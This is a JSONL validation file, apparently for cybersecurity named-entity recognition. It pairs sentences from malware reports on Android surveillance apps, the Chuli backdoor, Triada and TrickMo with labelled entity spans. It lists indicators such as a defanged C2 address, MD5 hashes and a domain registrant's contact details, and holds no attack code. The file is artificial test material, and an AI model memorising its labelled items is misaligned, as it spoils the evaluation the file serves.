{"text": "First , there is a small dropper , then a large second stage payload that contains multiple binaries ( where most of the surveillance functionality is implemented ) , and finally a third stage which typically uses the DirtyCOW exploit ( CVE-2016-5195 ) to obtain root .", "spans": {"Vulnerability: DirtyCOW exploit": [[218, 234]], "Vulnerability: CVE-2016-5195": [[237, 250]]}, "info": {"id": "cyner_valid_000529", "source": "cyner_valid"}}
{"text": "Security Without Borders has recently published an analysis of this family , independently , through their blog .", "spans": {"Organization: Security Without Borders": [[0, 24]]}, "info": {"id": "cyner_valid_000530", "source": "cyner_valid"}}
{"text": "These included the use of certificate pinning and public key encryption for C2 communications , geo-restrictions imposed by the C2 when delivering the second stage , and the comprehensive and well implemented suite of surveillance features .", "spans": {}, "info": {"id": "cyner_valid_000532", "source": "cyner_valid"}}
{"text": "Early versions of the Android application used infrastructure which belonged to a company named Connexxa S.R.L .", "spans": {"System: Android": [[22, 29]], "Organization: Connexxa S.R.L .": [[96, 112]]}, "info": {"id": "cyner_valid_000533", "source": "cyner_valid"}}
{"text": "and were signed using the name of an engineer who appears to hold equity in Connexxa .", "spans": {"Organization: Connexxa": [[76, 84]]}, "info": {"id": "cyner_valid_000534", "source": "cyner_valid"}}
{"text": "This engineer ’ s name is also associated with a company called eSurv S.R.L .", "spans": {"Organization: eSurv S.R.L .": [[64, 77]]}, "info": {"id": "cyner_valid_000535", "source": "cyner_valid"}}
{"text": "eSurv ’ s public marketing is centered around video surveillance software and image recognition systems , but there are a number of individuals claiming to be mobile security researchers working at the company , including one who has publically made claims to be developing a mobile surveillance agent .", "spans": {"Organization: eSurv": [[0, 5]]}, "info": {"id": "cyner_valid_000536", "source": "cyner_valid"}}
{"text": "Moreover , eSurv was a business unit of Connexxa and was leased to eSurv S.R.L in 2014 .", "spans": {"Organization: eSurv": [[11, 16]], "Organization: Connexxa": [[40, 48]], "Organization: eSurv S.R.L": [[67, 78]]}, "info": {"id": "cyner_valid_000537", "source": "cyner_valid"}}
{"text": "Lookout notified Google of the potential threat shortly after it was discovered .", "spans": {"Organization: Lookout": [[0, 7]], "Organization: Google": [[17, 23]]}, "info": {"id": "cyner_valid_000541", "source": "cyner_valid"}}
{"text": "iOS development Analysis of these Android samples led to the discovery of infrastructure that contained several samples of an iOS port .", "spans": {"System: iOS": [[0, 3], [126, 129]], "System: Android": [[34, 41]]}, "info": {"id": "cyner_valid_000543", "source": "cyner_valid"}}
{"text": "So far , this software ( along with the Android version ) has been made available through phishing sites that imitated Italian and Turkmenistani mobile carriers .", "spans": {"System: Android": [[40, 47]]}, "info": {"id": "cyner_valid_000544", "source": "cyner_valid"}}
{"text": "The Apple Developer Enterprise program is intended to allow organizations to distribute proprietary , in-house apps to their employees without needing to use the iOS App Store .", "spans": {"Organization: Apple Developer Enterprise": [[4, 30]], "System: iOS": [[162, 165]], "System: App Store": [[166, 175]]}, "info": {"id": "cyner_valid_000546", "source": "cyner_valid"}}
{"text": "A business can obtain access to this program only provided they meet requirements set out by Apple .", "spans": {"Organization: Apple": [[93, 98]]}, "info": {"id": "cyner_valid_000547", "source": "cyner_valid"}}
{"text": "It is not common to use this program to distribute malware , although there have been past cases where malware authors have done so .", "spans": {}, "info": {"id": "cyner_valid_000548", "source": "cyner_valid"}}
{"text": "Each of the phishing sites contained links to a distribution manifest , which contained metadata such as the application name , version , icon , and a URL for the IPA file .", "spans": {}, "info": {"id": "cyner_valid_000549", "source": "cyner_valid"}}
{"text": "To be distributed outside the app store , an IPA package must contain a mobile provisioning profile with an enterprise ’ s certificate .", "spans": {}, "info": {"id": "cyner_valid_000550", "source": "cyner_valid"}}
{"text": "All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L .", "spans": {"Organization: Connexxa S.R.L .": [[105, 121]]}, "info": {"id": "cyner_valid_000551", "source": "cyner_valid"}}
{"text": "One of the packages after initial launch The iOS variant is not as sophisticated as the Android version , and contained a subset of the functionality the Android releases offered .", "spans": {"System: iOS": [[45, 48]], "System: Android": [[88, 95], [154, 161]]}, "info": {"id": "cyner_valid_000553", "source": "cyner_valid"}}
{"text": "In particular , these packages have not been observed to contain or to download exploits which would be required to perform certain types of activities on iOS devices .", "spans": {"System: iOS": [[155, 158]]}, "info": {"id": "cyner_valid_000554", "source": "cyner_valid"}}
{"text": "Even without capabilities to exploit a device , the packages were able to exfiltrate the following types of data using documented APIs : Contacts Audio recordings Photos Videos GPS location Device information In addition , the packages offered a feature to perform remote audio recording .", "spans": {"System: GPS": [[177, 180]]}, "info": {"id": "cyner_valid_000555", "source": "cyner_valid"}}
{"text": "Though different versions of the app vary in structure , malicious code was initialized at application launch without the user ’ s knowledge , and a number of timers were setup to gather and upload data periodically .", "spans": {}, "info": {"id": "cyner_valid_000556", "source": "cyner_valid"}}
{"text": "Upload data was queued and transmitted via HTTP PUT requests to an endpoint on the C2 .", "spans": {}, "info": {"id": "cyner_valid_000557", "source": "cyner_valid"}}
{"text": "The iOS apps leverage the same C2 infrastructure as the Android version and use similar communications protocols .", "spans": {"System: iOS": [[4, 7]], "System: Android": [[56, 63]]}, "info": {"id": "cyner_valid_000558", "source": "cyner_valid"}}
{"text": "Push notifications were also used to control audio recording .", "spans": {}, "info": {"id": "cyner_valid_000559", "source": "cyner_valid"}}
{"text": "Lookout has shared information about this family with Apple , and they have revoked the affected certificates .", "spans": {"Organization: Lookout": [[0, 7]], "Organization: Apple": [[54, 59]]}, "info": {"id": "cyner_valid_000560", "source": "cyner_valid"}}
{"text": "As a result , no new instances of this app can be installed on iOS devices and existing installations can no longer be run .", "spans": {"System: iOS": [[63, 66]]}, "info": {"id": "cyner_valid_000561", "source": "cyner_valid"}}
{"text": "Lookout customers are also protected from this threat on both Android and iOS .", "spans": {"Organization: Lookout": [[0, 7]], "System: Android": [[62, 69]], "System: iOS": [[74, 77]]}, "info": {"id": "cyner_valid_000562", "source": "cyner_valid"}}
{"text": "Android Trojan Found in Targeted Attack 26 MAR 2013 In the past , we ’ ve seen targeted attacks against Tibetan and Uyghur activists on Windows and Mac OS X platforms .", "spans": {"System: Android": [[0, 7]], "System: Windows": [[136, 143]], "System: Mac OS X": [[148, 156]]}, "info": {"id": "cyner_valid_000563", "source": "cyner_valid"}}
{"text": "We ’ ve documented several interesting attacks ( A Gift for Dalai Lamas Birthday and Cyber Attacks Against Uyghur Mac OS X Users Intensify ) which used ZIP files as well as DOC , XLS and PDF documents rigged with exploits .", "spans": {"System: Mac OS X": [[114, 122]]}, "info": {"id": "cyner_valid_000564", "source": "cyner_valid"}}
{"text": "Several days ago , the e-mail account of a high-profile Tibetan activist was hacked and used to send targeted attacks to other activists and human rights advocates .", "spans": {}, "info": {"id": "cyner_valid_000565", "source": "cyner_valid"}}
{"text": "Perhaps the most interesting part is that the attack e-mails had an APK attachment – a malicious program for Android .", "spans": {"System: Android": [[109, 116]]}, "info": {"id": "cyner_valid_000566", "source": "cyner_valid"}}
{"text": "The attack On March 24th , 2013 , the e-mail account of a high-profile Tibetan activist was hacked and used to send spear phishing e-mails to their contact list .", "spans": {}, "info": {"id": "cyner_valid_000567", "source": "cyner_valid"}}
{"text": "This is what the spear phishing e-mail looked like : In regards to the message text above , multiple activist groups have recently organized a human rights conference event in Geneva .", "spans": {}, "info": {"id": "cyner_valid_000568", "source": "cyner_valid"}}
{"text": "We ’ ve noticed an increase in the number of attacks using this event as a lure .", "spans": {}, "info": {"id": "cyner_valid_000569", "source": "cyner_valid"}}
{"text": "Here ’ s another example of such an attack hitting Windows users : Going back to the Android Package ( APK ) file was attached to the e-mail , this is pushing an Android application named “ WUC ’ s Conference.apk ” .", "spans": {"System: Windows": [[51, 58]], "System: Android Package": [[85, 100]], "Malware: WUC ’ s Conference.apk": [[190, 212]]}, "info": {"id": "cyner_valid_000570", "source": "cyner_valid"}}
{"text": "This malicious APK is 334326 bytes file , MD5 : 0b8806b38b52bebfe39ff585639e2ea2 and is detected by Kaspersky Lab products as “ Backdoor.AndroidOS.Chuli.a ” .", "spans": {"Organization: Kaspersky Lab": [[100, 113]]}, "info": {"id": "cyner_valid_000571", "source": "cyner_valid"}}
{"text": "After the installation , an application named “ Conference ” appears on the desktop : If the victim launches this app , he will see text which “ enlightens ” the information about the upcoming event : The full text reads follows .", "spans": {}, "info": {"id": "cyner_valid_000572", "source": "cyner_valid"}}
{"text": "Notice notice the use of the mistaken “ Word ” instead of “ World ” : “ On behalf of all at the Word Uyghur Congress ( WUC ) , the Unrepresented Nations and Peoples Organization ( UNPO ) and the Society for Threatened Peoples ( STP ) , Human Rights in China : Implications for East Turkestan , Tibet and Southern Mongolia In what was an unprecedented coming-together of leading Uyghur , Mongolian , Tibetan and Chinese activists , as well as other leading international experts , we were greatly humbled", "spans": {"Organization: Word Uyghur Congress ( WUC )": [[96, 124]], "Organization: Unrepresented Nations and Peoples Organization ( UNPO )": [[131, 186]], "Organization: Society for Threatened Peoples ( STP )": [[195, 233]]}, "info": {"id": "cyner_valid_000573", "source": "cyner_valid"}}
{"text": "by the great enthusiasm , contribution and desire from all in attendance to make this occasion something meaningful , the outcome of which produced some concrete , action-orientated solutions to our shared grievances .", "spans": {}, "info": {"id": "cyner_valid_000574", "source": "cyner_valid"}}
{"text": "Dolkun lsa Chairman of the Executive Committee Word Uyghur Congress ” While the victim reads this fake message , the malware secretly reports the infection to a command-and-control server .", "spans": {"Organization: Executive Committee Word Uyghur Congress": [[27, 67]]}, "info": {"id": "cyner_valid_000577", "source": "cyner_valid"}}
{"text": "After that , it begins to harvest information stored on the device .", "spans": {}, "info": {"id": "cyner_valid_000578", "source": "cyner_valid"}}
{"text": "The stolen data includes : Contacts ( stored both on the phone and the SIM card ) .", "spans": {}, "info": {"id": "cyner_valid_000579", "source": "cyner_valid"}}
{"text": "Phone data ( phone number , OS version , phone model , SDK version ) .", "spans": {}, "info": {"id": "cyner_valid_000583", "source": "cyner_valid"}}
{"text": "It is important to note that the data won ’ t be uploaded to C & C server automatically .", "spans": {}, "info": {"id": "cyner_valid_000584", "source": "cyner_valid"}}
{"text": "The Trojan waits for incoming SMS messages ( the “ alarmReceiver.class ” ) and checks whether these messages contain one of the following commands : “ sms ” , “ contact ” , “ location ” , “ other ” .", "spans": {}, "info": {"id": "cyner_valid_000585", "source": "cyner_valid"}}
{"text": "The C2 URL is : hxxp : //64.78.161.133/ * victims ’ s_cell_phone_number * /process.php In addition to this , the malware also reports to another script , “ hxxp : //64.78.161.33/android.php ” .", "spans": {}, "info": {"id": "cyner_valid_000587", "source": "cyner_valid"}}
{"text": "First , it will get the “ nativenumber ” variable from the “ telmark ” value of “ AndroidManifest.xml ” .", "spans": {"System: AndroidManifest.xml": [[82, 101]]}, "info": {"id": "cyner_valid_000588", "source": "cyner_valid"}}
{"text": "Then , it will add the result of the public method localDate.getTime ( ) , which simply gets the current date .", "spans": {}, "info": {"id": "cyner_valid_000590", "source": "cyner_valid"}}
{"text": "An example of the string which is sent to the command-and-control would be “ phone 26.03.2013 ” .", "spans": {}, "info": {"id": "cyner_valid_000591", "source": "cyner_valid"}}
{"text": "It is interesting that the attackers used Java Base64 library developed by Sauron Software .", "spans": {"Organization: Sauron Software": [[75, 90]]}, "info": {"id": "cyner_valid_000592", "source": "cyner_valid"}}
{"text": "This software is free and distributed under LGPL license .", "spans": {}, "info": {"id": "cyner_valid_000593", "source": "cyner_valid"}}
{"text": "Also , command communications with the malware are parsed with a function named “ chuli ( ) ” prior to POSTing stolen data to the command-and-control server .", "spans": {}, "info": {"id": "cyner_valid_000594", "source": "cyner_valid"}}
{"text": "It appears that the attackers are somewhat familiar with the language and mountain-trekking culture of the targets – the meaning of “ chuli ” is “ summit ” : The command-and-control server and parameters can be easily seen in the decompiled source code : Command and control server interaction code Throughout the code , the attackers log all important actions , which include various messages in Chinese .", "spans": {}, "info": {"id": "cyner_valid_000595", "source": "cyner_valid"}}
{"text": "This was probably done for debugging purposes , indicating the malware may be an early prototype version .", "spans": {}, "info": {"id": "cyner_valid_000596", "source": "cyner_valid"}}
{"text": "This IP is located in Los Angeles , U.S.A. , at a hosting company named “ Emagine Concept Inc ” .", "spans": {"Organization: Emagine Concept Inc": [[74, 93]]}, "info": {"id": "cyner_valid_000598", "source": "cyner_valid"}}
{"text": "Interestingly , there is a domain which used to point there , “ DlmDocumentsExchange.com ” .", "spans": {}, "info": {"id": "cyner_valid_000599", "source": "cyner_valid"}}
{"text": "The domain was registered on March 8th , 2013 : Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. Domain Name : DLMDOCUMENTSEXCHANGE.COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail.com ) beijingshiahiidienquc.d beijingshi beijing,100000", "spans": {"Organization: SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD.": [[83, 146]]}, "info": {"id": "cyner_valid_000600", "source": "cyner_valid"}}
{"text": "+86.01078456689 Fax .", "spans": {}, "info": {"id": "cyner_valid_000602", "source": "cyner_valid"}}
{"text": "+86.01078456689 The command-and-control server is hosting an index page which also serves an APK file : The referenced “ Document.apk ” is 333583 bytes in size , MD5 : c4c4077e9449147d754afd972e247efc .", "spans": {}, "info": {"id": "cyner_valid_000603", "source": "cyner_valid"}}
{"text": "It has the same functionality as the one described above but contains different text .", "spans": {}, "info": {"id": "cyner_valid_000604", "source": "cyner_valid"}}
{"text": "The new text ( in Chinese , about relations between China , Japan and the disputed “ Senkaku Islands / Diaoyudao Islands / Diaoyutai Islands ” ) is shown to the victims and reads as following : When opened in a browser , this is what the command-and-control index page looks like : The text on the top means “ Title Title Title ” in Chinese , while the other strings appear to be random characters typed from the keyboard .", "spans": {}, "info": {"id": "cyner_valid_000605", "source": "cyner_valid"}}
{"text": "Interestingly , the command and control server includes a publicly accessible interface to work with the victims : Some of the commands with rough translations : The command-and-control server is running Windows Server 2003 and has been configured for Chinese language : This , together with the logs , is a strong indicator that the attackers are Chinese-speaking .", "spans": {"System: Windows Server": [[204, 218]]}, "info": {"id": "cyner_valid_000606", "source": "cyner_valid"}}
{"text": "Conclusions Every day , there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters .", "spans": {}, "info": {"id": "cyner_valid_000607", "source": "cyner_valid"}}
{"text": "The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158 , CVE-2010-3333 and CVE-2009-3129 .", "spans": {"System: Windows": [[34, 41]], "System: Word": [[59, 63]], "Vulnerability: CVE-2012-0158": [[115, 128]], "Vulnerability: CVE-2010-3333": [[131, 144]], "Vulnerability: CVE-2009-3129": [[149, 162]]}, "info": {"id": "cyner_valid_000608", "source": "cyner_valid"}}
{"text": "In this case , the attackers hacked a Tibetan activist ’ s account and used it to attack Uyghur activists .", "spans": {}, "info": {"id": "cyner_valid_000609", "source": "cyner_valid"}}
{"text": "It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities .", "spans": {}, "info": {"id": "cyner_valid_000610", "source": "cyner_valid"}}
{"text": "This technique reminds us of a combination between ages old war strategies “ Divide et impera ” and “ By way of deception ” .", "spans": {}, "info": {"id": "cyner_valid_000611", "source": "cyner_valid"}}
{"text": "Until now , we haven ’ t seen targeted attacks against mobile phones , although we ’ ve seen indications that these were in development .", "spans": {}, "info": {"id": "cyner_valid_000612", "source": "cyner_valid"}}
{"text": "The current attack took advantage of the compromise of a high-profile Tibetan activist .", "spans": {}, "info": {"id": "cyner_valid_000613", "source": "cyner_valid"}}
{"text": "So far , the attackers relied entirely on social engineering to infect the targets .", "spans": {}, "info": {"id": "cyner_valid_000615", "source": "cyner_valid"}}
{"text": "History has shown us that , in time , these attacks will use zero-day vulnerabilities , exploits or a combination of techniques .", "spans": {"Vulnerability: zero-day vulnerabilities": [[61, 85]]}, "info": {"id": "cyner_valid_000616", "source": "cyner_valid"}}
{"text": "For now , the best protection is to avoid any APK attachments that arrive on mobile phones via e-mail .", "spans": {}, "info": {"id": "cyner_valid_000617", "source": "cyner_valid"}}
{"text": "We detect the malware used in this attack as “ Backdoor.AndroidOS.Chuli.a ” .", "spans": {"Malware: Backdoor.AndroidOS.Chuli.a": [[47, 73]]}, "info": {"id": "cyner_valid_000618", "source": "cyner_valid"}}
{"text": "MD5s : c4c4077e9449147d754afd972e247efc Document.apk 0b8806b38b52bebfe39ff585639e2ea2 WUC ’ s Conference.apk Triada : organized crime on Android Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and uses several clever methods to become almost invisible March 3 , 2016 You know how armies typically move : first come the scouts to make sure everything is ok. Then the heavy troops", "spans": {"Malware: Triada": [[109, 115], [145, 151]], "System: Android": [[137, 144]]}, "info": {"id": "cyner_valid_000619", "source": "cyner_valid"}}
{"text": "arrive ; at least that was how it used to be before the age of cyber wars .", "spans": {}, "info": {"id": "cyner_valid_000620", "source": "cyner_valid"}}
{"text": "It turns out , that Trojans behave quite the same way .", "spans": {}, "info": {"id": "cyner_valid_000621", "source": "cyner_valid"}}
{"text": "There are a lot of small Trojans for Android capable of leveraging access privileges , in other words — gaining root access .", "spans": {"System: Android": [[37, 44]]}, "info": {"id": "cyner_valid_000622", "source": "cyner_valid"}}
{"text": "Our malware analysts Nikita Buchka and Mikhail Kuzin can easily name 11 families of such Trojans .", "spans": {}, "info": {"id": "cyner_valid_000623", "source": "cyner_valid"}}
{"text": "Most of them are almost harmless — all they did until recently was injecting tons of ads and downloading others of their kind .", "spans": {}, "info": {"id": "cyner_valid_000624", "source": "cyner_valid"}}
{"text": "If you want to know more about them — our researchers have an article about them on Securelist .", "spans": {"Organization: Securelist": [[84, 94]]}, "info": {"id": "cyner_valid_000625", "source": "cyner_valid"}}
{"text": "If you follow the military analogy — those are the scouts .", "spans": {}, "info": {"id": "cyner_valid_000626", "source": "cyner_valid"}}
{"text": "As you probably have noticed , gaining root access gives them the capability to download and install applications — that ’ s the reason why once one of them get into the system , in a few minutes there are all the others .", "spans": {}, "info": {"id": "cyner_valid_000627", "source": "cyner_valid"}}
{"text": "But our researchers have predicted that these small Trojans would certainly be used to download some really bad malware that can actually harm the owners of the infected devices .", "spans": {}, "info": {"id": "cyner_valid_000628", "source": "cyner_valid"}}
{"text": "And that ’ s exactly what has happened recently .", "spans": {}, "info": {"id": "cyner_valid_000629", "source": "cyner_valid"}}
{"text": "Small Trojans like Leech , Ztorg and Gopro now download one of the most advanced mobile Trojans our malware analysts have ever encountered — we call it Triada .", "spans": {"Malware: Leech": [[19, 24]], "Malware: Ztorg": [[27, 32]], "Malware: Gopro": [[37, 42]], "Malware: Triada": [[152, 158]]}, "info": {"id": "cyner_valid_000630", "source": "cyner_valid"}}
{"text": "The dark ways of the Triada Once downloaded and installed , the Triada Trojan first tries to collect some information about the system — like the device model , the OS version , the amount of the SD card space , the list of the installed applications and other things .", "spans": {"Malware: Triada": [[21, 27], [64, 70]]}, "info": {"id": "cyner_valid_000632", "source": "cyner_valid"}}
{"text": "Then it sends all that information to the Command & Control server .", "spans": {}, "info": {"id": "cyner_valid_000633", "source": "cyner_valid"}}
{"text": "We have detected a total of 17 C & C servers on 4 different domains , which probably means the bad guys are quite familiar with what redundancy is .", "spans": {}, "info": {"id": "cyner_valid_000634", "source": "cyner_valid"}}
{"text": "After the modules are installed they are deployed to the short term memory and deleted from the device storage , which makes the Trojan a lot harder to catch .", "spans": {}, "info": {"id": "cyner_valid_000636", "source": "cyner_valid"}}
{"text": "There are two more reasons why Triada is so hard to detect and why it had impressed our researchers so much .", "spans": {"Malware: Triada": [[31, 37]]}, "info": {"id": "cyner_valid_000637", "source": "cyner_valid"}}
{"text": "First , it modifies the Zygote process .", "spans": {"System: Zygote": [[24, 30]]}, "info": {"id": "cyner_valid_000638", "source": "cyner_valid"}}
{"text": "Triada : organized crime on Android Second , it substitutes the system functions and conceals its modules from the list of the running processes and installed apps .", "spans": {"Malware: Triada": [[0, 6]], "System: Android": [[28, 35]]}, "info": {"id": "cyner_valid_000640", "source": "cyner_valid"}}
{"text": "So the system doesn ’ t see any strange processes running and thus does not cry the alarm .", "spans": {}, "info": {"id": "cyner_valid_000641", "source": "cyner_valid"}}
{"text": "Those are not the only system functions Triada modifies .", "spans": {"Malware: Triada": [[40, 46]]}, "info": {"id": "cyner_valid_000642", "source": "cyner_valid"}}
{"text": "That is actually how the bad guys decided to monetize the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000644", "source": "cyner_valid"}}
{"text": "Some applications rely on SMS when it comes to in-app purchases — the transaction data is transferred via a short text message .", "spans": {}, "info": {"id": "cyner_valid_000645", "source": "cyner_valid"}}
{"text": "Users do not see those SMS because they are processed not by the SMS app , but by the app that has initiated the transaction — e.g a free-to-play game .", "spans": {}, "info": {"id": "cyner_valid_000647", "source": "cyner_valid"}}
{"text": "Triada ’ s functionality allows it to modify those messages , so the money is sent not to some app developer , but to the malware operators .", "spans": {"Malware: Triada": [[0, 6]]}, "info": {"id": "cyner_valid_000648", "source": "cyner_valid"}}
{"text": "Triada steals the money either from the users — if they haven ’ t succeeded in purchasing whatever they wanted , or from the app developers , in case the user has completed the purchase successfully .", "spans": {"Malware: Triada": [[0, 6]]}, "info": {"id": "cyner_valid_000649", "source": "cyner_valid"}}
{"text": "For now , that is the only way how cybercriminals can profit from Triada , but don ’ t forget that it ’ s a modular Trojan , so it can be turned into literally everything on one command from the C & C server .", "spans": {"Malware: Triada": [[66, 72]]}, "info": {"id": "cyner_valid_000650", "source": "cyner_valid"}}
{"text": "Fighting organized crime in your phone One of the main problems with Triada is that it can potentially hurt a LOT of people .", "spans": {"Malware: Triada": [[69, 75]]}, "info": {"id": "cyner_valid_000651", "source": "cyner_valid"}}
{"text": "As we ’ ve mentioned earlier , Triada is downloaded by smaller Trojans that have leveraged the access privileges .", "spans": {"Malware: Triada": [[31, 37]]}, "info": {"id": "cyner_valid_000652", "source": "cyner_valid"}}
{"text": "And our researchers estimate that in every 10 Android users 1 was attacked by either one or several of those Trojans during the second half of 2015 , so there are millions of devices with a huge possibility of being infected with Triada .", "spans": {"System: Android": [[46, 53]], "Malware: Triada": [[230, 236]]}, "info": {"id": "cyner_valid_000653", "source": "cyner_valid"}}
{"text": "So , what can you do to protect yourself from this stealthy beast ?", "spans": {}, "info": {"id": "cyner_valid_000654", "source": "cyner_valid"}}
{"text": "Never forget to update your system .", "spans": {}, "info": {"id": "cyner_valid_000656", "source": "cyner_valid"}}
{"text": "It turns out that those smaller Trojans face serious problems trying to get root access on Android 4.4.4 and above , because a lot of vulnerabilities were patched in these versions .", "spans": {"System: Android 4.4.4": [[91, 104]]}, "info": {"id": "cyner_valid_000657", "source": "cyner_valid"}}
{"text": "So if you have Android 4.4.4 or some more recent version of this OS on your device , your chances of getting infected with Triada are significantly lower .", "spans": {"System: Android 4.4.4": [[15, 28]], "Malware: Triada": [[123, 129]]}, "info": {"id": "cyner_valid_000658", "source": "cyner_valid"}}
{"text": "Yet our statistics says that about 60 % of Android users are still sitting with Android 4.4.2 and below .", "spans": {"System: Android": [[43, 50]], "System: Android 4.4.2 and below": [[80, 103]]}, "info": {"id": "cyner_valid_000659", "source": "cyner_valid"}}
{"text": "Better not to take any chances at all , no matter which version of the OS you use .", "spans": {}, "info": {"id": "cyner_valid_000661", "source": "cyner_valid"}}
{"text": "So we recommend installing an anti-virus solution on your Android device .", "spans": {}, "info": {"id": "cyner_valid_000662", "source": "cyner_valid"}}
{"text": "Just don ’ t forget that the scan does not run automatically in the free version .", "spans": {}, "info": {"id": "cyner_valid_000664", "source": "cyner_valid"}}
{"text": "But all in all Triada is yet another example of a really bad trend : malware developers are taking Android seriously , and the latest samples are almost as complex and hard to withstand , as their Windows-based kin .", "spans": {"Malware: Triada": [[15, 21]], "System: Android": [[99, 106]], "System: Windows-based": [[197, 210]]}, "info": {"id": "cyner_valid_000665", "source": "cyner_valid"}}
{"text": "The only good way to fight all these threats is to be proactive , and so a good security solution is a must .", "spans": {}, "info": {"id": "cyner_valid_000666", "source": "cyner_valid"}}
{"text": "TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany March 24 , 2020 IBM X-Force researchers analyzed an Android malware app that ’ s likely being pushed to infected users by the TrickBot Trojan .", "spans": {"Malware: TrickBot": [[0, 8], [189, 197]], "Organization: IBM X-Force": [[79, 90]], "System: Android": [[115, 122]]}, "info": {"id": "cyner_valid_000667", "source": "cyner_valid"}}
{"text": "While it ’ s not the first of its kind , this Android malware app is more sophisticated than similar apps and possesses interesting features that enable its operators to steal transaction authorization codes from victims who download the app .", "spans": {"System: Android": [[46, 53]]}, "info": {"id": "cyner_valid_000669", "source": "cyner_valid"}}
{"text": "According to our research , TrickMo is still under active development as we expect to see frequent changes and updates .", "spans": {"Malware: TrickMo": [[28, 35]]}, "info": {"id": "cyner_valid_000670", "source": "cyner_valid"}}
{"text": "While it can be used anywhere and target any bank or region , at this time , we are seeing it deployed specifically in Germany .", "spans": {}, "info": {"id": "cyner_valid_000671", "source": "cyner_valid"}}
{"text": "In 2020 , it appears that TrickBot ’ s vast bank fraud is an ongoing project that helps the gang monetize compromised accounts .", "spans": {"Malware: TrickBot": [[26, 34]]}, "info": {"id": "cyner_valid_000673", "source": "cyner_valid"}}
{"text": "First Signs in September 2019 In September 2019 , a tweet by CERT-Bund caught the attention of the IBM Trusteer Mobile Security Research team .", "spans": {"Organization: CERT-Bund": [[61, 70]], "Organization: IBM Trusteer Mobile Security Research": [[99, 136]]}, "info": {"id": "cyner_valid_000674", "source": "cyner_valid"}}
{"text": "The tweet stated that TrickBot , a well-known banking Trojan owned by an organized cybercrime gang , uses man-in-the-browser ( MITB ) web injects in online banking sessions to ask infected users for their mobile phone number and device type .", "spans": {"Malware: TrickBot": [[22, 30]]}, "info": {"id": "cyner_valid_000675", "source": "cyner_valid"}}
{"text": "Machine translation of this tweet reads : “ Watch out for online banking : Emotet reloads TrickBot .", "spans": {"Malware: Emotet": [[75, 81]], "Malware: TrickBot": [[90, 98]]}, "info": {"id": "cyner_valid_000676", "source": "cyner_valid"}}
{"text": "On infected PCs , TrickBot displays a query for the mobile phone number and the device type used for banking and then prompts users to install an alleged security app. ” When banking Trojans ask for this type of information , it usually means the next step will be an attempt to infect the victim ’ s mobile device .", "spans": {"Malware: TrickBot": [[18, 26]]}, "info": {"id": "cyner_valid_000677", "source": "cyner_valid"}}
{"text": "Our team went ahead and hunted for samples of the app and analyzed it in our labs .", "spans": {}, "info": {"id": "cyner_valid_000678", "source": "cyner_valid"}}
{"text": "In this analysis , we get into the capabilities of the new variant and what we found to be a “ kill switch ” that can eliminate the malware remotely from an infected device .", "spans": {}, "info": {"id": "cyner_valid_000679", "source": "cyner_valid"}}
{"text": "Desktop Trojans and Their Mobile Component The process by which Trojans attempt to infect mobile devices is at least a decade old .", "spans": {}, "info": {"id": "cyner_valid_000680", "source": "cyner_valid"}}
{"text": "Usually , when users are already infected with malware like TrickBot on their desktop , they will see a web injection asking for their mobile device operating system ( OS ) type and phone number .", "spans": {"Malware: TrickBot": [[60, 68]]}, "info": {"id": "cyner_valid_000681", "source": "cyner_valid"}}
{"text": "Next , if they indicate that they use an Android-based device , the Trojan , impersonating their bank with web injections , fools the victim into installing a fake security app .", "spans": {"System: Android-based": [[41, 54]]}, "info": {"id": "cyner_valid_000682", "source": "cyner_valid"}}
{"text": "Our research team analyzed the malicious Android application that is most likely being spread by TrickBot and dubbed it “ TrickMo. ” Targeting users in Germany at this time , TrickMo is the latest variation in the transaction authentication number ( TAN ) -stealing malware category .", "spans": {"System: Android": [[41, 48]], "Malware: TrickBot": [[97, 105]], "Malware: TrickMo.": [[122, 130]], "Malware: TrickMo": [[175, 182]]}, "info": {"id": "cyner_valid_000684", "source": "cyner_valid"}}
{"text": "Its main capabilities include : Stealing personal device information Intercepting SMS messages Recording targeted applications for one-time password ( TAN ) Lockdown of the phone Stealing pictures from the device Self-destruction and removal As banks release more advanced security measures , banking malware evolves to keep up with the perpetual arms race .", "spans": {}, "info": {"id": "cyner_valid_000685", "source": "cyner_valid"}}
{"text": "From our analysis of the TrickMo mobile malware , it is apparent that TrickMo is designed to break the newest methods of OTP and , specifically , TAN codes often used in Germany .", "spans": {"Malware: TrickMo": [[25, 32], [70, 77]]}, "info": {"id": "cyner_valid_000686", "source": "cyner_valid"}}
{"text": "Among the various features we discuss in this post , we believe that TrickMo ’ s most significant novelty is an app recording feature , which gives it the ability to overcome the newer pushTAN app validations used by German banks .", "spans": {"Malware: TrickMo": [[69, 76]]}, "info": {"id": "cyner_valid_000687", "source": "cyner_valid"}}
{"text": "In the analysis that follows , we describe in detail the capabilities of this new variant and a “ kill switch ” that can remotely eliminate the malware from a mobile device .", "spans": {}, "info": {"id": "cyner_valid_000688", "source": "cyner_valid"}}
{"text": "Why Do Desktop Trojans Use a Mobile Component ?", "spans": {}, "info": {"id": "cyner_valid_000689", "source": "cyner_valid"}}
{"text": "About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim ’ s online banking account and perform money transfers .", "spans": {}, "info": {"id": "cyner_valid_000690", "source": "cyner_valid"}}
{"text": "As a countermeasure , financial institutions introduced various second factor authentication ( 2FA ) methods .", "spans": {}, "info": {"id": "cyner_valid_000691", "source": "cyner_valid"}}
{"text": "One method , which was popular in Germany , is known as mobile TAN ( mTAN ) .", "spans": {}, "info": {"id": "cyner_valid_000692", "source": "cyner_valid"}}
{"text": "It was implemented by sending an SMS message containing a one-time password ( OTP ) to the client ’ s mobile device .", "spans": {}, "info": {"id": "cyner_valid_000693", "source": "cyner_valid"}}
{"text": "The transaction would only be authorized after the client enters the TAN into the online banking website in their browser .", "spans": {}, "info": {"id": "cyner_valid_000694", "source": "cyner_valid"}}
